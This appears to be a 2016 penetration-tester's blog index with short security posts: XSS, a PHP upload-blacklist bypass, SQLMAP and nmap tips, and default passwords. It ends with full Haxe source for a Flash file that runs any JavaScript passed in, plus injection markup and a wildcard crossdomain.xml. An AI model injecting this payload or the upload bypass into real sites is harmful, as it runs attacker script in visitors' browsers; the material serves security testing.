Friday, December 30, 2016

possible XSS execution in Javascript context

The following browser behaviour may be useful for bug bounty programs.

Thursday, December 29, 2016

bypass of php file extension blacklist for file uploads in standard ubuntu 12.04 lts LAMP setup

Weeks ago during a penetration test I bypassed a file upload filter by naming the file php. [dot].

worst virus example :)

that’s definitely the worst virus code example I have ever seen :)

Monday, December 26, 2016

how to save time using SQLMAP with file input

In the past I spent some time recreating a request that works with SQLMAP (cookies, headers, multipart forms, etc.).

subdomain discovery with nmap and custom subdomain files

How to discover/brute-force subdomains of a domain with the nmap dns-brute script and custom subdomain files.

Thursday, December 22, 2016

how to set up a raspberry pi 2 model b for wlan sniffing

The setup described below works with a Raspberry Pi 2 Model B and Wheezy as the operating system. It does not work with Raspberry Pi 3 and Jessie.

Sunday, December 4, 2016

twelve "low hanging fruits" application owners can check by themselves before ordering a penetration test.

The following 12 common security issues can easily be checked by application owners themselves before ordering a penetration test. This will not replace the need for a penetration test, but it can save time and money.

Sunday, November 6, 2016

when the switches and wlan router in a SPA hotel work with default passwords

..then it's easy to get access. password "password" :) time to set up your own DNS server ;)

Monday, October 31, 2016

cipher check with

SSLLABS is good to check ciphers, but for IP addresses and non-443 ports it does not work. orders the ciphers for each protocol (ssl.x, tls.x) in server-preferred sort order.
(the red ones are weak)

Friday, October 28, 2016

Amazing how fast Chinese "hijack" your machine as a proxy.

Last week during a test I configured FIDDLER to accept remote connections from the internet on the standard port 8888. During my tests I immediately recognized calls from an unknown source crawling online travel agencies using my machine as a proxy. My IP was one located in the US.

Tuesday, October 25, 2016

checking TTL of a domain with dig

Since the latest DDoS attacks on DNS servers, it can be useful to check the TTL setting for domains. The TTL sets how long a DNS server caches the result of the last lookup. In stable environments one of the most commonly used settings is 3600 (one hour).

Thursday, October 13, 2016

mobile policy acronyms

lol today I learned a lot of strange mobile device policy acronyms.

COBO-Company Owned, Business Only.
COPE-Company Owned, Personally Enabled.
BYOD-Bring your own device.
CYOD-Choose your own device.

Monday, January 4, 2016

create a simple flash using HAXE with (dynamic) javascript as parameter

Download and install HAXE

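Create the source file (XSS.hx)
import flash.external.ExternalInterface;

class XSS {

    public static function main() {
        // Read the JavaScript function name and its argument from FlashVars
        var command:String = flash.Lib.current.loaderInfo.parameters.command;
        var param:String = flash.Lib.current.loaderInfo.parameters.param;
        // Call the named JavaScript function in the embedding page
        ExternalInterface.call(command, param);
    }
}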

Compile it
haxe XSS.hx -swf xss.swf -main XSS -swf-version 9

Inject it - 1

<object data="xss.swf">
   <param name="allowScriptAccess" value="always">
   <param name="FlashVars" value="command=alert&param=XSS%20SUCCESSFULL2">
</object>


Inject it - 2



If you load the Flash file from another domain, you need to set the crossdomain.xml

<?xml version="1.0" ?>
<cross-domain-policy>
    <allow-access-from domain="*" />
</cross-domain-policy>

create a simple flash using HAXE with (static) javascript alert message

simple html form post example for CSRF attacks